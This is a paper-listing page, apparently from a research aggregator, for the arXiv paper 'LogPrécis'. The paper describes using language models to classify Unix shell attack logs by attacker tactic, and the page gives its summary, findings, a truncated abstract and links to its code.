LogPr\'ecis: Unleashing Language Models for Automated Malicious Log   Analysis

Matteo Boffa; Rodolfo Vieira Valentim; Luca Vassio; Danilo Giordano,; Idilio Drago; Marco Mellia; Zied Ben Houidi

arXiv:2307.08309·cs.CR·March 25, 2024

LogPr\'ecis: Unleashing Language Models for Automated Malicious Log Analysis

Matteo Boffa, Rodolfo Vieira Valentim, Luca Vassio, Danilo Giordano,, Idilio Drago, Marco Mellia, Zied Ben Houidi

PDF

Open Access 1 Repo 2 Models

TL;DR

LogPrécis leverages advanced language models to automatically analyze and categorize large volumes of Unix shell attack logs, aiding cybersecurity experts in understanding attack sequences, detecting new threats, and improving defense strategies.

Contribution

This paper introduces LogPrécis, a novel methodology that uses language models to automatically interpret and abstract malicious shell logs, significantly reducing data complexity and enhancing attack analysis capabilities.

Findings

01

Successfully processed 400,000 attack sessions into 3,000 fingerprints

02

Enabled better understanding and tracking of attack sequences and mutations

03

Open-sourced the LogPrécis tool for community use

Abstract

The collection of security-related logs holds the key to understanding attack behaviors and diagnosing vulnerabilities. Still, their analysis remains a daunting challenge. Recently, Language Models (LMs) have demonstrated unmatched potential in understanding natural and programming languages. The question arises whether and how LMs could be also useful for security experts since their logs contain intrinsically confused and obfuscated information. In this paper, we systematically study how to benefit from the state-of-the-art in LM to automatically analyze text-like Unix shell attack logs. We present a thorough design methodology that leads to LogPr\'ecis. It receives as input raw shell sessions and automatically identifies and assigns the attacker tactic to each portion of the session, i.e., unveiling the sequence of the attacker's goals. We demonstrate LogPr\'ecis capability to…

Peer Reviews

No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.

Code & Models

Repositories

smartdata-polito/logprecis
pytorchOfficial

Models

Videos

No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.

Taxonomy

TopicsSoftware System Performance and Reliability · Software Engineering Research · Network Security and Intrusion Detection